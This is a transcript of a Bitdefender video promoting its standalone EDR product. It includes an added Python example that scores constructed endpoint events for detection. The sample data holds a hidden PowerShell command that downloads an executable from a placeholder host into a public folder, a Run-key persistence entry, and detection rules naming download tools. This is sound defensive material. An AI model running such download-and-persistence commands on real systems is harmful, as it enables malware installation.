Bitdefender Endpoint Detection and Response – Part 2
This is a transcript of the Bitdefender video below.
Bitdefender Endpoint Detection and Response is an effective, easy-to-use solution that strengthens your organizational security operations. Being a cloud-delivered and low-maintenance solution, standalone EDR is easy to deploy and integrates with your existing security architecture. The solution is fully compatible with your existing antivirus solution and caters to organizations whose existing security solution does not provide advanced threat visibility and response. It helps uncover suspicious activity and provides tools to enable you to fight off cyber attacks.
EDR’s threat visualization provides focused investigation, understanding of complex detections, and identification of the root cause of attacks. The easy-to-follow built-in response workflows enable security teams to respond efficiently, limit lateral spread, and stop ongoing attacks.
Bitdefender Standalone EDR package also provides risk management, which continuously analyzes organizations to identify risks and provides clear guidance to assist in user, network, and OS risk mitigation.
Bitdefender EDR offers a combination of detective, investigative, and compensative security controls that allow our customers to see beyond the typical alerts from our preventive framework. It utilizes the latest and current technologies to provide higher visibility and collect and correlate threat information while employing analytics and automation to help detect suspicious events. Bitdefender Sandbox Analyzer provides pre-execution detection of advanced attacks by automatically sending files that require further analysis to the cloud sandbox and taking remediation action based on the verdict. Thus, incident response teams can perform a fast alert triage and incident investigation using an attack timeline and sandbox output, enabling a faster response to stop ongoing attacks.
Need for EDR
Now, let’s dig deeper to see when an EDR solution would come into play while using it with the preventive technologies. Let’s assume that a threat adversary was able to send malware and infect the victim’s endpoint using several initial access techniques such as drive-by compromise, remote desktop protocol compromise, targeted spear phishing, and exploiting weaknesses on public-facing web servers.
The preventive technologies cover traditional anti-malware scanning to contain the malware strains. Endpoint detection and response covers advanced capabilities, like investigating security incidents to detect suspicious system events such as registry key changes, remote file downloads, hash modifications, privilege escalations, and lateral movements.
EDR employs Advanced Threat Analytics to detect and perform investigations to provide visibility on tactics, techniques, and procedures of modern threat adversaries. Any detected suspicious file is sent to the Bitdefender Cloud Sandbox for further analysis. The Cloud Sandbox solution performs static and dynamic analysis of the files to correlate events and detect malicious patterns. Based on the severity of the infection, a score value is assigned, and appropriate actions are triggered.
The standalone EDR solution provides a granular, in-depth analysis report to alert the security teams. It reduces the time and effort spent on key security operation functions. Incident responders can either kill the ongoing suspicious process or take other appropriate response actions. Bitdefender standalone EDR solution provides enhanced visibility and data contextualization to be considered complementary to a SIEM tool. Our EDR technology is the happy medium between endpoint protection and SIEM, representing a perfect fit for most of our SMB to mid-market customers.
Now, let’s take a look at the standalone EDR management console on GravityZone. We begin with the package configuration, which is preconfigured with zero trust execution protection, host-based network exploit protection, and our endpoint detection and response sensor for advanced threat detection and response.
Moving on to policy configuration. Standalone EDR technology has modified anti-malware options together with Sandbox Analyzer. This anti-malware technology provides Cloud-Based Threat Detection, which uses advanced machine learning algorithms. Along with that, it provides both execution protection and Fileless Attack Protection. These technologies are configured to report-only mode and assist the existing endpoint protection by providing threat visibility and appropriate response options.
The Sandbox Analyzer performs analysis by monitoring the suspicious activities; the content prefiltering scans the files, command line arguments, and URLs for suspicious behavior. The module automatically determines the objects that need further analysis and submits them to Sandbox Analyzer depending on the configured protection level. Along with anti-malware, the standalone EDR provides host-based network protection, which reports to security teams when attack techniques like initial access, credential access, and lateral movement are detected on the endpoint.
Additionally, the technology enables recurring risk scanning on targeted endpoints. It detects security misconfigurations and provides clear guidance on risk mitigation.
Now, let’s take a look at what a reported suspicious security event looks like on GravityZone. As you can see in the image below, a score value is associated with the detection. This indicates the severity of the infection and the confidence that the technology has in the detected suspicious endpoint activity.
The security event is represented in a graphical format, with the suspected root causes highlighted. On the right, the technology provides information on the detected application and the suspicious behavior carried out on the endpoint.
The security analyst investigating the event can add the application or file to the cloud sandbox or use open-source intelligence tools like VirusTotal or Google. As remediation, the analyst can either kill the process and stop the ongoing attack or consider it a false positive and add it as an exception.
Additionally, as a preventive measure, certain suspicious processes or files can be added to a block list to prevent them from executing. It eases the operational burden by recommending steps to mitigate the incident and prevent it from recurring in the future. Using advanced machine learning algorithms, the EDR sensor was able to intercept and determine the suspicious behavior of the command line argument. It recorded all system events with timestamps to support focused investigation.
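As an added illustration (not Bitdefender code, and not its actual scoring logic), the following Python shows the idea behind score-based detection over constructed endpoint events: rule hits for the event classes named above (a command line that downloads a remote file, an executable dropped in a public directory, a Run-key change) are summed into a per-host severity score and laid out as a timestamped timeline. Rule names, weights and the sample events are all assumptions made for this example.

```python
import json

# Constructed sample of EDR-style endpoint events (not real Bitdefender telemetry);
# one newline-delimited JSON event per line, deliberately out of time order.
SAMPLE_EVENTS = r'''
{"ts":"2024-01-10T09:00:01Z","host":"ws-01","type":"process","pid":4100,"cmdline":"powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/a.exe -OutFile C:\\Users\\Public\\a.exe"}
{"ts":"2024-01-10T09:00:09Z","host":"ws-01","type":"registry","pid":4210,"key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater","action":"set"}
{"ts":"2024-01-10T09:00:04Z","host":"ws-01","type":"file","pid":4100,"path":"C:\\Users\\Public\\a.exe","action":"create"}
{"ts":"2024-01-10T09:01:00Z","host":"ws-02","type":"process","pid":880,"cmdline":"notepad.exe C:\\Users\\alice\\notes.txt"}
'''

def _cmd(e):
    return e.get("cmdline", "").lower()

# Each rule: (name, weight, predicate). Weights are illustrative, not Bitdefender's.
RULES = [
    ("remote_download_via_cmdline", 35, lambda e: e["type"] == "process"
        and "http" in _cmd(e) and any(t in _cmd(e) for t in ("invoke-webrequest", "certutil", "curl"))),
    ("hidden_window_powershell", 10, lambda e: e["type"] == "process"
        and "powershell" in _cmd(e) and "-w hidden" in _cmd(e)),
    ("executable_dropped_in_public_dir", 15, lambda e: e["type"] == "file"
        and e.get("action") == "create" and e.get("path", "").lower().endswith(".exe")
        and "\\users\\public\\" in e.get("path", "").lower()),
    ("run_key_persistence", 30, lambda e: e["type"] == "registry"
        and "\\currentversion\\run" in e.get("key", "").lower()),
]

def parse_events(text):
    """Parse newline-delimited JSON events and order them by timestamp (ISO 8601 sorts lexically)."""
    return sorted((json.loads(l) for l in text.strip().splitlines() if l.strip()), key=lambda e: e["ts"])

def correlate(events):
    """Group rule hits per host into an incident with a severity score (capped at 100) and a timeline."""
    incidents = {}
    for e in events:
        hits = [(name, w) for name, w, pred in RULES if pred(e)]
        if not hits:
            continue                      # benign event: not part of any incident
        inc = incidents.setdefault(e["host"], {"score": 0, "timeline": []})
        inc["score"] = min(100, inc["score"] + sum(w for _, w in hits))
        inc["timeline"].append((e["ts"], e["type"], [n for n, _ in hits]))
    return incidents

if __name__ == "__main__":
    for host, inc in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(f"{host}: score={inc['score']}")
        for ts, kind, names in inc["timeline"]:
            print(f"  {ts} {kind:9} {', '.join(names)}")
```

Only ws-01 accumulates a score here; the unrelated notepad process on ws-02 produces no rule hit and so never appears in the output.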
Thus, when the customer’s existing security solution does not provide the required advanced attack visibility, our standalone endpoint detection and response can quickly and effectively optimize and strengthen security functions.